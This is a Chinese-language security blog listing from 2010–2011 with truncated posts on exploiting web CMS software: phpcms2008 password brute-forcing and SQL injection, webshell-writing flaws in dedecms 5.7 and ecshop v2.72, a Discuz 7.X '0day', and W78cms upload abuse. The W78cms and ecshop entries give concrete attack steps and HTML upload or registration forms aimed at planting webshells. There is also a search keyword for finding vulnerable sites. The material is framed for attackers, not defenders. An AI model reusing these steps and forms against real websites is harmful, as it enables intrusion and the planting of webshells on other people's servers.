phpcms2008密码暴力破解

作者:admin 日期:2011-05-09

来源：Dis9 Team users==>chowner

说明下，这个确实比较蛋疼没啥意义，是在我之前检测一个站的时候发现是phpcms2008的，看了下加密方式，随便就弄了个试了下，发现代码版块帖子太少了实在不忍心干脆发来凑个数，admin别ban我ID啊，呵呵。
phpcms2008的加密方式

Tags: phpcms phpcms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 16

dedecms 5.7后台拿SHELL漏洞

作者:admin 日期:2011-05-09

漏洞说明：dedecms 5.7教之前的版本有了很大的改进，修复了5.6以下版本严重的上传0day；相当的鸡肋，前提是有了后台权限。由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名，导致直接写入webshell漏洞。

方法一见：dedecms5.7拿SHELL漏洞即修复

关键词：Powered by DedeCMSV57_GBK

Tags: dedecms dedecms

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 37

PhpCms2008 注射漏洞0day

作者:admin 日期:2010-12-23

代码分析说明：

01 case ''list'':

02 $catid = intval($catid);

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 71

Discuz7.X通杀0day

作者:admin 日期:2010-12-23

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__–==__–==__–==__–==__–==__–==__–==__–==__–==__–==

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 88

ecshop v2.72 前台写shell漏洞

作者:admin 日期:2010-12-23

<title>ecshop v2.72 前台写shell漏洞 by:xhm1n9</title>

<form method=”post” name=”register” action=”http://127.1/ecshop2.72/demo/index.php”>

<h3>ecshop v2.72 前台写shell漏洞</h3><br>利用方试：提交两次，第二次内容任意</br>

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 81

W78cms网站管理系统0day

作者:admin 日期:2010-12-23

访问这个地址
http://xxx.com/nbwebshell/admin/ ... cusdir=sitedirsec.asp
访问这个地址可以建立个sitedirsec.asp的文件夹……
再用这个html代码上传。
<form action=" http://www.xxxx.com/ShopMore.asp?id=16&Page=1/nbwebshell/admin/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=sitedirsec.asp" method=post name=myform enctype="multipart/form-data">

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 72